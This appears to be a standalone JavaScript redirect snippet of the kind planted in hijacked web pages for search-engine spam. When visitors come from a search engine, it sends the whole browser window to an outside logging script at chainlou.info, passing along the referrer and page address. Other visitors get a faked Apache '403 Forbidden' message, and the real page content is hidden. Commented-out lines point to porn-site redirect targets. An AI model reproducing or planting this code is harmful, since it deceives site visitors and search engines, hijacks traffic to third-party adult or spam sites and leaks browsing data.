 if(top.document.referrer.indexOf("search") == -1 &&
    top.document.referrer.indexOf("?")      == -1)
 {
  window.document.title='403 Forbidden';
  window.document.body.style.backgroundColor='white';
  window.document.body.style.color='black';
  document.writeln("<H1>Forbidden</H1>");
  document.writeln("You don't have permission to access "+window.location.pathname);
  document.writeln("on this server.<P>");
  document.writeln("<HR>");
  document.writeln("<ADDRESS>Apache/1.3.29 Server at "+window.location.hostname+" Port 80</ADDRESS>");
  document.writeln("<div style='display:none'>");
 }
 else
 {
//  top.location.href='http://www.pornsites-reviews.com/main/';
  top.location.href='http://www.chainlou.info/selog2.cgi?ref='+escape(top.document.referrer)+'&page='+escape(top.document.location);
// top.location.href='http://pqc42sx.pqcservice.net/snapnames/www/free.great-porn.net/selog.cgi?ref='+escape(top.document.referrer)+'&page='+escape(top.document.location);
 }
